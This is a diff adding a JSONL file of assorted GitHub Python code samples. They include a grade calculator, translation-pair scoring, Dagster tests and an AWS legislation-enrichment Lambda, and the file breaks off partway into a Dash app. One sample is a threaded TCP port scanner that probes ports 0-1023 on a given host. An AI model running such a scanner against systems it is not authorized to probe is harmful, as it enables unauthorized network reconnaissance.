diff --git "a/090.jsonl" "b/090.jsonl" new file mode 100644--- /dev/null +++ "b/090.jsonl" @@ -0,0 +1,2110 @@ +{"seq_id":"17078211412","text":"__author__ = 'breddels'\nimport javaobj\nimport sys\nimport io\n\n\nif __name__ == \"__main__\":\n import logging\n javaobj._log.setLevel(logging.DEBUG)\n jobj = file(sys.argv[1]).read()[16 + 5:]\n print((repr(jobj[:100])))\n pobj, index = javaobj.loads(jobj)\n rest = jobj[index:]\n import zlib\n print((repr(rest[:100])))\n datastr = zlib.decompress(rest, -15)\n stream = io.StringIO(datastr)\n m = javaobj.JavaObjectUnmarshaller(stream)\n data = m.readObject()\n while len(data) == 2:\n print((data[0].classdesc.name))\n # datastr = datastr[data[1]:]\n x = stream.read(3)\n print((\"data left\", [hex(ord(k)) for k in x]))\n stream.seek(-3, 1)\n # x = stream.read(10)\n # print \"data left\", [hex(ord(k)) for k in x]\n # stream.seek(-10, 1)\n # data = javaobj.loads(datastr)\n data = m.readObject()\n print(data)\n if data[0] == \"END\":\n print(\"end...\")\n x = stream.read(10)\n i\n print((\"data left\", [hex(ord(k)) for k in x]))\n\n print(data)\n # print pobj, index\n","repo_name":"vaexio/vaex","sub_path":"packages/vaex-ui/vaex/ui/gbin.py","file_name":"gbin.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":8057,"dataset":"github-code","pt":"53"} +{"seq_id":"72356579688","text":"#!/usr/bin/python3\n\nimport getopt, sys, os.path\nimport csv\nimport re\nimport numpy\nimport bisect\nimport math\n\ndef usage():\n scriptname = os.path.basename(sys.argv[0])\n print(\"usage: \" + scriptname + ' ')\n\ndef getopts():\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"ho:v\", [\"help\", \"output=\"])\n except getopt.GetoptError as err:\n print(err)\n usage()\n sys.exit(2)\n\n output = None\n verbose = False\n for o, a in opts:\n if o == \"-v\":\n verbose = True\n elif o in (\"-h\", \"--help\"):\n usage()\n sys.exit()\n elif o in (\"-o\", \"--output\"):\n output = a\n else:\n assert False, \"unhandled option\"\n\n if len(args) != 2:\n usage()\n sys.exit(2)\n\n infilename = args[0]\n outfilename = args[1]\n return infilename, outfilename\n\ndef getgrade(g):\n # Grade table\n gradetable =[(70.0, 'F'), (73.0, 'C-'), (77.0, 'C'), (80.0, 'C+'), (83.0, 'B-'), (87.0, 'B'), (90.0, 'B+'), (93.0, 'A-'), (97.0, 'A'), (100.0, 'A+')]\n\n pos = bisect.bisect_right(gradetable, (math.ceil(g),))\n return gradetable[pos][1]\n\ndef main():\n infilename, outfilename = getopts()\n\n with open(infilename, newline='') as infile, open(outfilename, 'w', newline='') as outfile:\n studentreader = csv.DictReader(infile, delimiter=',', quotechar='\"', skipinitialspace=True)\n outfields = ['Last Name', 'First Name', 'Student ID', 'SectionId', 'Final_Assigned_Egrade', 'Score']\n studentwriter = csv.DictWriter(outfile, outfields, delimiter=',', quotechar='\"', skipinitialspace=True)\n studentwriter.writeheader()\n\n # Get keys from first record\n s = next(studentreader)\n keys = s.keys()\n # Return reader to first record (second line in file)\n infile.seek(0)\n next(studentreader)\n\n # Assessment items\n assessmentitems = []\n assessments = [{\"title\": \"Homework\", \"pattern\": r'HW', \"function\": lambda x: (sum(x) - min(x))/(len(x)-1), \"weight\": 15}, {\"title\": \"Matlab\", \"pattern\": r'MATLAB', \"function\": lambda x: (sum(x) - min(x))/(len(x)-1), \"weight\": 10}, {\"title\": \"Midterm\", \"pattern\": r'Midterm', \"function\": lambda x: numpy.mean(x), \"weight\": 40}, {\"title\": \"Final\", \"pattern\": r'Final', \"function\": 
lambda x: sum(x), \"weight\": 35}]\n pointspattern = r'\\[Total Pts: ([^]]+)]'\n\n for assessment in assessments:\n loopkeys = [k for k in keys if re.match(assessment[\"pattern\"], k)]\n assessmentitems.append({\"title\": assessment[\"title\"], \"keys\": loopkeys, \"function\": assessment[\"function\"], \"weight\": assessment[\"weight\"]})\n\n for student in studentreader:\n studentout = {}\n studentout['Last Name'] = student['Last Name']\n studentout['First Name'] = student['First Name']\n studentout['Student ID'] = student['Student ID']\n studentout['SectionId'] = student['SectionId [Total Pts: 100] |122054']\n\n scores = []\n \n for assessmentitem in assessmentitems:\n func = assessmentitem[\"function\"]\n itemscores = [float(student[k]) if student[k] else 0.0 for k in assessmentitem[\"keys\"]]\n itempoints = numpy.array([float(re.search(pointspattern, k).group(1)) for k in assessmentitem[\"keys\"]])\n itempercentages = numpy.divide(itemscores, itempoints)\n total = func(itempercentages)\n weightedtotal = assessmentitem[\"weight\"] * total\n\n scores.append({\"title\": assessmentitem[\"title\"], \"scores\": itemscores, \"points\": itempoints, \"percentages\": itempercentages, \"total\": total, \"weightedtotal\": weightedtotal})\n \n\n weightedscore = sum(score[\"weightedtotal\"] for score in scores)\n studentout['Final_Assigned_Egrade'] = getgrade(weightedscore)\n studentout['Score'] = weightedscore\n\n studentwriter.writerow(studentout)\n \n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"pabryan/homedir","sub_path":"bin/ucsd_calculate_grades.py","file_name":"ucsd_calculate_grades.py","file_ext":"py","file_size_in_byte":4062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33862778451","text":"import marshal\nimport math\nimport operator\nfrom optparse import OptionParser\n\nimport torch\nimport torch.nn.functional as F\nfrom apex import amp\nfrom torch.nn.utils.rnn import pad_sequence\n\nfrom seq2seq import Seq2Seq, future_mask\nfrom textprocessor import TextProcessor\n\n\ndef get_option_parser():\n parser = OptionParser()\n parser.add_option(\"--tok\", dest=\"tokenizer_path\", help=\"Path to the tokenizer folder\", metavar=\"FILE\", default=None)\n parser.add_option(\"--model\", dest=\"model\", metavar=\"FILE\", default=None)\n parser.add_option(\"--fp16\", action=\"store_true\", dest=\"fp16\", default=False)\n parser.add_option(\"--capacity\", dest=\"total_capacity\", help=\"Batch capacity\", type=\"int\", default=2000)\n parser.add_option(\"--data\", dest=\"data\", metavar=\"FILE\", default=None)\n parser.add_option(\"--sens\", dest=\"sens\", metavar=\"FILE\", default=None)\n parser.add_option(\"--output\", dest=\"output\", metavar=\"FILE\", default=None)\n parser.add_option(\"--resume\", dest=\"resume_index\", type=\"int\", default=0)\n parser.add_option(\"--end\", dest=\"end_index\", type=\"int\", default=-1)\n parser.set_default(\"model_size\", 6)\n return parser\n\n\ntok_sen = lambda s: text_processor.tokenize_one_sentence(s)[:512]\n\n\ndef create_batches(sentences, src2dst_dict, text_processor: TextProcessor, resume_index=0, end_index=-1):\n print(len(src2dst_dict))\n\n print(\"Getting batches...\")\n index = 0\n\n for sid in src2dst_dict.keys():\n index += 1\n if index >= end_index and end_index > 0:\n break\n if index <= resume_index:\n continue\n tids = list(src2dst_dict[sid])\n source_tokenized = torch.LongTensor(tok_sen(sentences[sid]))\n trans_cands = list(map(lambda i: 
torch.LongTensor(tok_sen(sentences[i])), tids))\n candidates = pad_sequence(trans_cands, batch_first=True, padding_value=text_processor.pad_token_id())\n target_langs = list(map(lambda i: text_processor.lang_id(sentences[i].strip().split(\" \")[0]), tids))\n src_lang = torch.LongTensor([text_processor.lang_id(sentences[sid].strip().split(\" \")[0])])\n yield sid, source_tokenized, torch.LongTensor(tids), candidates, src_lang, torch.LongTensor(target_langs)\n\n\nif __name__ == \"__main__\":\n parser = get_option_parser()\n (options, args) = parser.parse_args()\n\n print(\"Loading text processor...\")\n text_processor = TextProcessor(options.tokenizer_path)\n num_processors = max(torch.cuda.device_count(), 1)\n\n print(\"Loading model...\")\n model = Seq2Seq.load(Seq2Seq, options.model, tok_dir=options.tokenizer_path)\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n model = model.to(device)\n num_gpu = torch.cuda.device_count()\n\n assert num_gpu <= 1\n if options.fp16:\n model = amp.initialize(model, opt_level=\"O2\")\n\n max_capacity = options.total_capacity * 1000000\n with torch.no_grad(), open(options.output, \"w\") as writer:\n print(\"Loading data...\")\n with open(options.sens, \"rb\") as fp, open(options.data, \"rb\") as fp2:\n sentences = marshal.load(fp)\n src2dst_dict = marshal.load(fp2)\n\n print(\"Scoring candidates\")\n for i, batch in enumerate(\n create_batches(sentences, src2dst_dict, text_processor, options.resume_index, options.end_index)):\n try:\n sid, src_input, tids_all, tgt_inputs_all, src_lang, dst_langs_all = batch\n cur_capacity = 2 * (max(int(src_input.size(0)), int(tgt_inputs_all.size(1))) ** 3) * int(\n tgt_inputs_all.size(0))\n split_size = int(math.ceil(cur_capacity / max_capacity))\n split_size = max(1, int(math.floor(len(tids_all) / split_size)))\n\n tgt_inputs_spl = torch.split(tgt_inputs_all, split_size)\n tids_spl = torch.split(tids_all, split_size)\n dst_langs_spl = torch.split(dst_langs_all, split_size)\n\n trans_score = dict()\n for spl_i in range(len(tgt_inputs_spl)):\n src_input = src_input.view(-1, src_input.size(0)).to(device)\n src_mask = (src_input != text_processor.pad_token_id())\n src_lang = src_lang.to(device)\n encoder_states = model.encode(src_input, src_mask, src_lang.expand(src_input.size()))[0]\n\n tgt_inputs, tids, dst_langs = tgt_inputs_spl[spl_i], tids_spl[spl_i], dst_langs_spl[spl_i]\n tgt_mask = (tgt_inputs != text_processor.pad_token_id()).to(device)\n\n tgt_inputs = tgt_inputs.to(device)\n dst_langs = dst_langs.to(device)\n batch_lang = int(dst_langs[0])\n subseq_mask = future_mask(tgt_mask[:, :-1])\n if subseq_mask.device != tgt_inputs.device:\n subseq_mask = subseq_mask.to(device)\n\n decoder = model.decoder if not model.lang_dec else model.decoder[batch_lang]\n output_layer = model.output_layer if not model.lang_dec else model.output_layer[batch_lang]\n\n enc_states = encoder_states.expand(len(tgt_inputs), encoder_states.size(1), encoder_states.size(2))\n src_mask_spl = src_mask.expand(len(tgt_inputs), src_mask.size(1))\n dst_langs = dst_langs.unsqueeze(1).expand(tgt_inputs.size())\n decoder_output = decoder(encoder_states=enc_states, input_ids=tgt_inputs[:, :-1],\n encoder_attention_mask=src_mask_spl, tgt_attention_mask=subseq_mask,\n token_type_ids=dst_langs[:, :-1])\n predictions = F.log_softmax(output_layer(decoder_output), dim=-1)\n\n predictions = predictions.view(-1, predictions.size(-1))\n targets = tgt_inputs[:, 1:].contiguous().view(-1)\n w_losses = tgt_mask[:, 1:] * predictions.gather(1, 
targets.view(-1, 1)).squeeze(-1).view(\n len(tgt_mask),\n -1)\n loss = torch.sum(w_losses, dim=1)\n loss = torch.div(loss, torch.sum(tgt_mask[:, 1:], dim=-1)).cpu().numpy()\n for j, l in enumerate(loss):\n tid = tids[j]\n trans_score[tid] = l\n sorted_dict = sorted(trans_score.items(), key=operator.itemgetter(1), reverse=True)\n tid, score = sorted_dict[0]\n writer.write(sentences[sid] + \"\\t\" + sentences[tid] + \"\\t\" + str(score))\n writer.write(\"\\n\")\n\n print(options.resume_index + i + 1, len(src2dst_dict), end=\"\\r\")\n except RuntimeError:\n pass\n\n print(\"\\nDone!\")\n","repo_name":"rasoolims/ImageTranslate","sub_path":"src/score_pairs.py","file_name":"score_pairs.py","file_ext":"py","file_size_in_byte":6810,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"5664587181","text":"\nfrom typing import NamedTuple, Optional, Literal\nfrom .registrant_workflows import RegistrantWorkflows\nfrom .list_workshops_workflow import ListWorkshopsWorkflow\nfrom .attendance_workflow import AttendanceWorkflow\n\nclass App(NamedTuple):\n workshop_workflow: ListWorkshopsWorkflow\n registrant_workflows: RegistrantWorkflows\n attendance_workflow: AttendanceWorkflow\n \n def list_upcoming_workshops(self) -> None:\n self.workshop_workflow.check_upcoming_workshops()\n\n def list_registrants(self, workshop_id: str, status: Optional[Literal['approved', 'waitlisted', 'rejected']] = None) -> None:\n \n if status and status not in ['approved', 'waitlisted', 'rejected']:\n raise ValueError(\"given status invalid\")\n self.registrant_workflows.list_registrants(workshop_id=workshop_id, status = status)\n\n def update_registration_status(\n self, \n workshop_id: str, \n registration_id: str,\n to_status: Literal['approved','rejected', 'waitlisted'],\n ) -> None:\n self.registrant_workflows.update_registrant_status(\n workshop_id=workshop_id, \n registration_id=registration_id,\n to_status=to_status,\n )\n \n def create_attendance_summary(self, workshop_id: str, output_filename: Optional[str] = None) -> None:\n self.attendance_workflow.create_attendance_summary(workshop_id=workshop_id, output_filename=output_filename)\n","repo_name":"ibehave-ibots/course-attendance-service","sub_path":"workshop-registration/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34091791645","text":"from api.local_stocks.Ticker import Ticker\n\nREMOVE_TICKER = 'remove-ticker'\n\n\ndef remove_ticker(args):\n\t\"\"\"\n\tUpdate the provided ticker if it already exists\n\t\"\"\"\n\tif args is None:\n\t\targs = []\n\n\tif len(args) < 1:\n\t\tprint(\"ERROR: Please provide a ticker to remove\")\n\t\treturn 1\n\n\ttest_ticker = args[0]\n\tprint('Removing ticker: %s' % test_ticker)\n\tfound_t = Ticker.get_ticker(test_ticker)\n\tif found_t is None:\n\t\tprint(\"Ticker %s is not in the database. Nothing to do. 
Exiting.\" % test_ticker)\n\t\treturn 0\n\n\tTicker.delete_ticker(test_ticker)\n\tprint(\"Ticker %s successfully deleted!\" % test_ticker)\n\treturn 0\n","repo_name":"michaelalbinson/glowing-pancake-praw","sub_path":"cli/remove_ticker.py","file_name":"remove_ticker.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9889493067","text":"import os\n\nimport pytest\nfrom dagster import DagsterInstance, job, op, reconstructable, repository\nfrom dagster._core.execution.api import execute_job\nfrom dagster._core.execution.plan.resume_retry import ReexecutionStrategy\nfrom dagster._core.storage.dagster_run import DagsterRunStatus\nfrom dagster._core.storage.tags import RESUME_RETRY_TAG\nfrom dagster._core.test_utils import (\n environ,\n instance_for_test,\n poll_for_finished_run,\n step_did_not_run,\n step_succeeded,\n)\nfrom dagster._core.workspace.context import WorkspaceProcessContext\nfrom dagster._core.workspace.load_target import PythonFileTarget\n\nCONDITIONAL_FAIL_ENV = \"DAGSTER_CONDIIONAL_FAIL\"\n\n\n@op\ndef before_failure():\n return \"hello\"\n\n\n@op\ndef conditional_fail(_, input_value):\n if os.environ.get(CONDITIONAL_FAIL_ENV):\n raise Exception(\"env set, failing!\")\n\n return input_value\n\n\n@op\ndef after_failure(_, input_value):\n return input_value\n\n\n@job(tags={\"foo\": \"bar\"})\ndef conditional_fail_job():\n after_failure(conditional_fail(before_failure()))\n\n\n@repository\ndef repo():\n return [conditional_fail_job]\n\n\n@pytest.fixture(name=\"instance\", scope=\"module\")\ndef instance_fixture():\n with instance_for_test() as instance:\n yield instance\n\n\n@pytest.fixture(name=\"workspace\", scope=\"module\")\ndef workspace_fixture(instance):\n with WorkspaceProcessContext(\n instance,\n PythonFileTarget(\n python_file=__file__,\n attribute=None,\n working_directory=None,\n location_name=\"repo_loc\",\n ),\n ) as workspace_process_context:\n yield workspace_process_context.create_request_context()\n\n\n@pytest.fixture(name=\"code_location\", scope=\"module\")\ndef code_location_fixture(workspace):\n return workspace.get_code_location(\"repo_loc\")\n\n\n@pytest.fixture(name=\"external_job\", scope=\"module\")\ndef external_job_fixture(code_location):\n return code_location.get_repository(\"repo\").get_full_external_job(\"conditional_fail_job\")\n\n\n@pytest.fixture(name=\"failed_run\", scope=\"module\")\ndef failed_run_fixture(instance):\n # trigger failure in the conditionally_fail op\n with environ({CONDITIONAL_FAIL_ENV: \"1\"}):\n result = execute_job(\n reconstructable(conditional_fail_job),\n instance=instance,\n tags={\"fizz\": \"buzz\", \"foo\": \"not bar!\"},\n )\n\n assert not result.success\n\n return instance.get_run_by_id(result.run_id)\n\n\ndef test_create_reexecuted_run_from_failure(\n instance: DagsterInstance,\n workspace,\n code_location,\n external_job,\n failed_run,\n):\n run = instance.create_reexecuted_run(\n parent_run=failed_run,\n code_location=code_location,\n external_job=external_job,\n strategy=ReexecutionStrategy.FROM_FAILURE,\n )\n\n assert run.tags[RESUME_RETRY_TAG] == \"true\"\n assert set(run.step_keys_to_execute) == {\"conditional_fail\", \"after_failure\"} # type: ignore\n instance.launch_run(run.run_id, workspace)\n run = poll_for_finished_run(instance, run.run_id)\n\n assert run.status == DagsterRunStatus.SUCCESS\n assert step_did_not_run(instance, run, \"before_failure\")\n assert step_succeeded(instance, run, 
\"conditional_fail\")\n assert step_succeeded(instance, run, \"after_failure\")\n\n\ndef test_create_reexecuted_run_from_failure_tags(\n instance: DagsterInstance,\n code_location,\n external_job,\n failed_run,\n):\n run = instance.create_reexecuted_run(\n parent_run=failed_run,\n code_location=code_location,\n external_job=external_job,\n strategy=ReexecutionStrategy.FROM_FAILURE,\n )\n\n assert run.tags[\"foo\"] == \"bar\"\n assert \"fizz\" not in run.tags\n\n run = instance.create_reexecuted_run(\n parent_run=failed_run,\n code_location=code_location,\n external_job=external_job,\n strategy=ReexecutionStrategy.FROM_FAILURE,\n use_parent_run_tags=True,\n )\n\n assert run.tags[\"foo\"] == \"not bar!\"\n assert run.tags[\"fizz\"] == \"buzz\"\n\n run = instance.create_reexecuted_run(\n parent_run=failed_run,\n code_location=code_location,\n external_job=external_job,\n strategy=ReexecutionStrategy.FROM_FAILURE,\n use_parent_run_tags=True,\n extra_tags={\"fizz\": \"not buzz!!\"},\n )\n\n assert run.tags[\"foo\"] == \"not bar!\"\n assert run.tags[\"fizz\"] == \"not buzz!!\"\n\n\ndef test_create_reexecuted_run_all_steps(\n instance: DagsterInstance, workspace, code_location, external_job, failed_run\n):\n run = instance.create_reexecuted_run(\n parent_run=failed_run,\n code_location=code_location,\n external_job=external_job,\n strategy=ReexecutionStrategy.ALL_STEPS,\n )\n\n assert RESUME_RETRY_TAG not in run.tags\n\n instance.launch_run(run.run_id, workspace)\n run = poll_for_finished_run(instance, run.run_id)\n\n assert run.status == DagsterRunStatus.SUCCESS\n assert step_succeeded(instance, run, \"before_failure\")\n assert step_succeeded(instance, run, \"conditional_fail\")\n assert step_succeeded(instance, run, \"after_failure\")\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster/dagster_tests/core_tests/instance_tests/test_instance_reexecution.py","file_name":"test_instance_reexecution.py","file_ext":"py","file_size_in_byte":5069,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"13391058106","text":"#!/usr/bin/env python3\n\nimport json\nimport logging\n\nimport boto3\nimport spacy\n\nfrom database import db_connection\nfrom utils.environment_helpers import validate_env_variable\nfrom utils.initialise_db import init_db_connection\n\nLOGGER = logging.getLogger()\nLOGGER.setLevel(logging.INFO)\n\n\n# isolating processing from event unpacking for portability and testing\ndef process_event(sqs_rec):\n \"\"\"\n Function to fetch the XML, call the legislation replacements pipeline and upload the enriched XML to the\n destination bucket\n \"\"\"\n s3_client = boto3.client(\"s3\")\n\n message = json.loads(sqs_rec[\"body\"])\n LOGGER.info(\"EVENT: %s\", message)\n msg_attributes = sqs_rec[\"messageAttributes\"]\n replacements = message[\"replacements\"]\n source_key = msg_attributes[\"source_key\"][\"stringValue\"]\n\n source_bucket = msg_attributes[\"source_bucket\"][\"stringValue\"]\n LOGGER.info(\"Replacement bucket from message\")\n LOGGER.info(source_bucket)\n\n LOGGER.info(\"Input bucket name:%s\", source_bucket)\n LOGGER.info(\"Input S3 key:%s\", source_key)\n\n # fetch the judgement contents\n file_content = (\n s3_client.get_object(Bucket=source_bucket, Key=source_key)[\"Body\"]\n .read()\n .decode(\"utf-8\")\n )\n\n # determine legislation replacements\n replacements = determine_replacements(file_content)\n LOGGER.info(\"Detected citations and built replacements\")\n replacements_encoded = 
write_replacements_file(replacements)\n LOGGER.info(\"Wrote replacements to file\")\n LOGGER.info(replacements_encoded)\n\n # open and read existing file from s3 bucket\n replacements_content = (\n s3_client.get_object(Bucket=REPLACEMENTS_BUCKET, Key=source_key)[\"Body\"]\n .read()\n .decode(\"utf-8\")\n )\n replacements_encoded = replacements_content + replacements_encoded\n\n uploaded_key = upload_replacements(\n REPLACEMENTS_BUCKET, source_key, replacements_encoded\n )\n LOGGER.info(\"Uploaded replacements to %s\", uploaded_key)\n push_contents(source_bucket, source_key)\n # enrichment_tracking(ENRICHMENT_BUCKET, \"enrichment_tracking.csv\")\n LOGGER.info(\n \"Message sent on queue to start determine-replacements-abbreviations lambda\"\n )\n\n\ndef enrichment_tracking(bucket, key):\n \"\"\"\n Print XML to track progress\n \"\"\"\n s3_resource = boto3.resource(\"s3\")\n s3_object = s3_resource.Object(bucket, key)\n\n # data = s3_object.get()[\"Body\"].read().decode(\"utf-8\").splitlines()\n data = s3_object.get()[\"Body\"].read().decode(\"utf-8\")\n\n print(data)\n # lines = csv.reader(data)\n # headers = next(lines)\n # print(\"headers: %s\" % (headers))\n # for line in lines:\n # print complete line\n # print(line)\n # print index wise\n # print(line[0], line[1])\n\n\ndef write_replacements_file(replacement_list):\n \"\"\"\n Writes tuples of abbreviations and long forms from a list of replacements\n \"\"\"\n tuple_file = \"\"\n for i in replacement_list:\n replacement_object = {\"{}\".format(type(i).__name__): list(i)}\n tuple_file += json.dumps(replacement_object)\n tuple_file += \"\\n\"\n return tuple_file\n\n\ndef upload_replacements(replacements_bucket, replacements_key, replacements):\n \"\"\"\n Uploads replacements to S3 bucket\n \"\"\"\n LOGGER.info(\n \"Uploading text content to %s/%s\", replacements_bucket, replacements_key\n )\n s3 = boto3.resource(\"s3\")\n object = s3.Object(replacements_bucket, replacements_key)\n object.put(Body=replacements)\n return object.key\n\n\ndef init_NLP():\n \"\"\"\n Load spacy model\n \"\"\"\n nlp = spacy.load(\n \"en_core_web_sm\", exclude=[\"tok2vec\", \"attribute_ruler\", \"lemmatizer\", \"ner\"]\n )\n nlp.max_length = 2500000\n return nlp\n\n\ndef close_connection(db_conn):\n \"\"\"\n Close the database connection\n \"\"\"\n db_connection.close_connection(db_conn)\n\n\ndef determine_replacements(file_content):\n \"\"\"\n Fetch legislation replacements from database\n \"\"\"\n # connect to the database\n db_conn = init_db_connection()\n LOGGER.info(\"Connected to database\")\n\n # setup the spacy pipeline\n nlp = init_NLP()\n LOGGER.info(\"Loaded NLP model\")\n\n doc = nlp(file_content)\n\n leg_titles = db_connection.get_legtitles(db_conn)\n\n replacements = get_legislation_replacements(leg_titles, nlp, doc, db_conn)\n LOGGER.info(\"Replacements identified\")\n LOGGER.info(len(replacements))\n close_connection(db_conn)\n\n return replacements\n\n\ndef get_legislation_replacements(leg_titles, nlp, doc, db_conn):\n \"\"\"\n Runs the legislation pipeline on the XML and returns the replacements\n \"\"\"\n from legislation_extraction.legislation_matcher_hybrid import leg_pipeline\n\n replacements = leg_pipeline(leg_titles, nlp, doc, db_conn)\n print(replacements)\n return replacements\n\n\ndef push_contents(uploaded_bucket, uploaded_key):\n \"\"\"\n Delivers replacements to the specified queue\n \"\"\"\n # Get the queue\n sqs = boto3.resource(\"sqs\")\n queue = sqs.Queue(DEST_QUEUE)\n\n # Create a new message\n message = {\"replacements\": 
uploaded_key}\n msg_attributes = {\n \"source_key\": {\"DataType\": \"String\", \"StringValue\": uploaded_key},\n \"source_bucket\": {\"DataType\": \"String\", \"StringValue\": uploaded_bucket},\n }\n queue.send_message(\n MessageBody=json.dumps(message), MessageAttributes=msg_attributes\n )\n\n\nDEST_QUEUE = validate_env_variable(\"DEST_QUEUE_NAME\")\nREPLACEMENTS_BUCKET = validate_env_variable(\"REPLACEMENTS_BUCKET\")\nENRICHMENT_BUCKET = validate_env_variable(\"ENRICHMENT_BUCKET\")\n\n\ndef handler(event, context):\n \"\"\"\n Function called by the lambda to run the process event\n \"\"\"\n LOGGER.info(\"Determine legislation replacements\")\n LOGGER.info(DEST_QUEUE)\n try:\n LOGGER.info(\"SQS EVENT: %s\", event)\n\n for sqs_rec in event[\"Records\"]:\n # stop the test notification event from breaking the parsing logic\n if \"Event\" in sqs_rec.keys() and sqs_rec[\"Event\"] == \"s3:TestEvent\":\n break\n process_event(sqs_rec)\n\n except Exception as exception:\n LOGGER.error(\"Exception: %s\", exception)\n raise\n","repo_name":"nationalarchives/ds-caselaw-data-enrichment-service","sub_path":"src/lambdas/determine_replacements_legislation/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":6153,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"24913931237","text":"#!/usr/bin/python3\n\nimport socket\nfrom IPy import IP\nimport optparse\nimport threading\nfrom array import *\nfrom IPy import IP\nfrom datetime import datetime\n\ndef portscan(tar,port):\n try:\n ip = checker(tar)\n sock = socket.socket()\n sock.settimeout(5)\n sock.connect((ip, port))\n try:\n serv = socket.getservbyport(port)\n print(port,\"\\topen\\t\",serv)\n except:\n print(port,\"\\topen\\tUnknown service!!\")\n except:\n pass\n\n\n\n#this is to checker is in ip or domain name\ndef checker(target):\n try:\n IP(target)\n return (target)\n except ValueError:\n return socket.gethostbyname(target)\n\ndef main():\n try:\n parser = optparse.OptionParser( 'Usage of program: '+ '-H \\n EAMPLE : ./portscan.py -H 8.8.8.8 \\n \\t./portscan.py -H google.com ')\n parser.add_option('-H', dest='tgtHost', type='string', help= 'specify target host')\n (options, args) = parser.parse_args()\n tgtHost = options.tgtHost\n\n #this is for display options\n if (tgtHost) == None :\n print(parser.usage)\n exit(0)\n\n # Add Banner\n print(\"-\" * 50)\n print(\"Scanning Target: \" + socket.gethostbyname(tgtHost))\n print(\"Scanning started at:\" + str(datetime.now()))\n print(\"-\" * 50)\n print(\"\"\"PORT\\tSTATE\\tSERVICE\"\"\")\n\n for port in range(0,1024):\n t= threading.Thread(target=portscan, args=(tgtHost,int(port)))\n t.start()\n\n except KeyboardInterrupt:\n print(\"\\n Exiting Program !!!!\")\n exit(0)\n except socket.gaierror:\n print(\"\\n Hostname Could Not Be Resolved !!!!\")\n exit(0)\n except socket.error:\n print(\"\\ Server not responding !!!!\")\n exit(0)\n\n\nif __name__ == '__main__':\n main()","repo_name":"17arun/scanners","sub_path":"Port Scanner/port scanner.py","file_name":"port scanner.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9105484607","text":"import random\nimport time\nimport functools\n\n\ndef create_table(size, min, max):\n tab = []\n for i in range(0, size + 1):\n random_int = random.randint(min, max)\n tab.append(random_int)\n return tab\n\n\ndef timeit(func):\n @functools.wraps(func)\n def new_func(*args, **kwargs):\n 
start_time = time.time()\n result = func(*args, **kwargs)\n elapsed_time = time.time() - start_time\n print('function [{}] finished in {} ms'.format(\n func.__name__, int(elapsed_time * 1_000)))\n return result\n\n return new_func\n\n\ndef merge_sort(A):\n if len(A) > 1:\n mid = len(A) // 2\n L = A[:mid]\n R = A[mid:]\n merge_sort(L)\n merge_sort(R)\n i = j = k = 0\n while i < len(L) and j < len(R):\n if L[i] < R[j]:\n A[k] = L[i]\n i += 1\n else:\n A[k] = R[j]\n j += 1\n k += 1\n while i < len(L):\n A[k] = L[i]\n i += 1\n k += 1\n while j < len(R):\n A[k] = R[j]\n j += 1\n k += 1\n\n\n@timeit\ndef merg_sort_timed(A):\n merge_sort(A)\n\n\ntable_size = 100000\n# samples:\nRandomArray = create_table(table_size, 1, table_size)\n\nSortedArray = RandomArray[:]\nSortedArray.sort()\n\nReversedArray = SortedArray[::-1][:]\n\n\n\nprint(\"For random data : \", end='')\nmerg_sort_timed(RandomArray)\nprint(\"-----------------\")\nprint(\"For sorted data : \", end='')\nmerg_sort_timed(SortedArray)\nprint(\"-----------------\")\nprint(\"For sorted in reverse order data : \", end='')\nmerg_sort_timed(ReversedArray)\n","repo_name":"JanOstrowski1/sorting-algorithms-efficiency","sub_path":"merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27808360582","text":"#!/usr/bin/python\nimport librosa\nimport numpy as np\nimport matplotlib.pyplot as plt\nf_name = \"trainfile016_CettisWarbler03\"\n\nfile_path = \"../zShortBirdRecordings/\" + f_name + \".wav\"\n\ny, sr = librosa.load(file_path)\n\nfreq_min = 500\nfreq_max = 8000\n\n# Passing through arguments to the Mel filters\nS = librosa.feature.melspectrogram(y=y, sr=sr, n_mels=128, fmin=freq_min, fmax=freq_max)\n\n\nlibrosa.display.specshow(librosa.logamplitude(S,\n ref_power=np.max),\n y_axis='mel', fmin=freq_min, fmax=freq_max,\n x_axis='time')\n\nplt.colorbar(format='%+2.0f dBFS')\nplt.title('Mel spectrogram')\nplt.tight_layout()\nplt.show()\n#plt.savefig(filename=\"../zShortMelSpectrograms/\" + f_name + \".png\")\n","repo_name":"Wubuntu88/BirdCallClassification","sub_path":"figure_generator_scripts/melspectrogram_tester.py","file_name":"melspectrogram_tester.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8425508985","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.graph_objects as go\nfrom dash.dependencies import Input, Output, State\n\nimport pandas as pd\nimport dash\nimport dash_core_components as dcc\nimport plotly.graph_objects as go\nimport dash_html_components as html\n\n\nimport plotly.express as px\nimport numpy as np\nfrom plotly.subplots import make_subplots\n\n\n\n# Reading in the data \ndf = pd.read_csv('data/Flu_Shot_Data_cleaned_2.csv')\n\ndata = 